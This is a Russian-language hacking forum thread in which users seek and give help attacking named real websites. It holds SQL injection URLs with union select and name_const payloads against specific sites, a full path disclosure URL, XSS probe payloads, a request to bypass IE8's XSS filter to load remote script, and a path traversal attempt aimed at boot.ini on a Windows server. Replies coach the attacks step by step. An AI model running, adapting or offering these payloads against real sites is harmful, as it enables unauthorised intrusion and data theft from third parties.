Подскажите пожалуйста, какие есть способы обхода встроенного xss фильтра для IE8. Перепробовал все способы с этой статьи: http://www.xakep.ru/magazine/xa/130/062/1.asp на версии 8.0.6001.18702 - ни один не работает. В результате xss желательно подгрузить свой .js файл через src или каким-то иным способом, чтобы код в нем исполнился. Заранее спасибо
а вопрос SQL inj Code: http://www.mahiram.com/browse_classifieds.php?classifiedcat_id=4%20or(1,2)=(select*from(select%20name_const(version(),1),name_const(version(),1))a) FPD Code: http://www.mahiram.com/wp-includes/vars.php?PHP_SELF=be
http://www.mahiram.com/browse_classifieds.php?classifiedcat_id=4 Error: The used SELECT statements have a different number of columns blind sql
Для начала - где эта хсс. Насчет "фильтрация и..." сказать ничего не могу, т.к. данным софтом не пользовался.
вот тут: http://onona.ua/diary/search.phtml?type=popular&tag=1206302%3C%3E я вот не могу понять как мне найти что бы появилось окошко ----------------------------------------------------------------- а каким лучше скриптом проверять на уязвимость ?? "><script>alert('xss')</script> <script type="text/javascript">Alert("XSS")</ SCRIPT> или на пиши свой ТУТ МНЕ ПОМОГУТ ? разобраться
Уж простите нуба, но самому интересно что это: При выполнении такого запроса, вверху сайта появляется строчка Code: function dF(s){var s1=unescape(s.substr(0,s.length-1)); var t='';for(i=0;i'));dF('&4Dtdsjqu&4Fbmfsu&39&38YTT&38&3:&4D0tdsjqu&4F1')"> Что это? Понимаю, что здесь подобных вопросов(и нубов) сотни, но интересно - что это?
Help!помогите! нашел уязвимость!но не могу правельно составить запрос! http://www.activ.kz/ru/?l=news&o=display&page=&idx=345 Microsoft JET Database Engine error '80040e14' Syntax error in string in query expression 'NEWS_ID=345';'. /ru/_news.asp, line 260 http://www.activ.kz/ru/?l=news&o=display&page=&idx=345+union+select+1,2,3,4,5,6,7,8+from+news http://www.activ.kz/ru/?l=news&o=display&page=&idx=-345+union+select+*+from+msysobjects+in+'.' Microsoft JET Database Engine error '80004005' The Microsoft Jet database engine cannot open the file 'c:\windows\system32\inetsrv'. It is already opened exclusively by another user, or you need permission to view its data. /ru/_news.asp, line Но вывести нечего не удаеться. Поскажите, как правилбно составить запрос.
Запрос правильный. Вот например выводится id новости. Code: http://www.activ.kz/ru/?l=news&o=display&page=&idx=345+union+select+1,2,3,4,NEWS_ID,6,7,8+from+news Так как доступа нет к системным таблицам MS Access, подбирать таблицу и колонки придется в ручную. Советую почитать Проведение SQL инъекций в Microsoft Access
http://www.7not.net/?m=news&n=' http://www.7not.net/?n=-1' Как здесь запрос составить подскажите.Пробовал и union+select и order+by и что-то ничего не выходит
PHP: $a = preg_replace('/\//','',$_GET["b"]); подскажите, тут можно как-нибудь выполнить произвольный код?
Это равносильно тому, что написать: $a = $_GET['a']; тут есть выполнение произвольного кода? Может переменная попадает в SQL запрос, или eval, или include, или просто выводится на страницу. Исходя из этого уже можно делать какие то выводы. А пока что, экстрасенсов тут нет. Все, что можно сказать по этой строке, это то, что переменная 'a' равна переменной 'b', переданной методом GET с отфильтрованными слешами. Либо выкладывай больше кода, либо выполнения произвольного кода здесь нет.
А при чем тут выполнение кода? Тут, я так понимаю, режуться символы от LFI\RFI. Есть способы обхода данного фильтра, фильтр слишком глупый =\ UPD: Я что-то не понял фильтра, там вроде массив должен быть, но не как все сразу перечислены, такой фильтр не от чего не защищает
Выдержка из этой статьи: https://forum.antichat.ru/thread56756.html В моем случае так нельзя проделать?
дальше идет: PHP: $f = fopen("./$a", "r"); while($r=fread($f, 1024)) print $r; все это крутится на винде, скорее всего хр. т.к. / фильтруются, пробовал ..\..\..\..\..\..\..\boot.ini но не выводит ничего. ошибки не выводятся, путей нет. какие варианты дальнейших действий?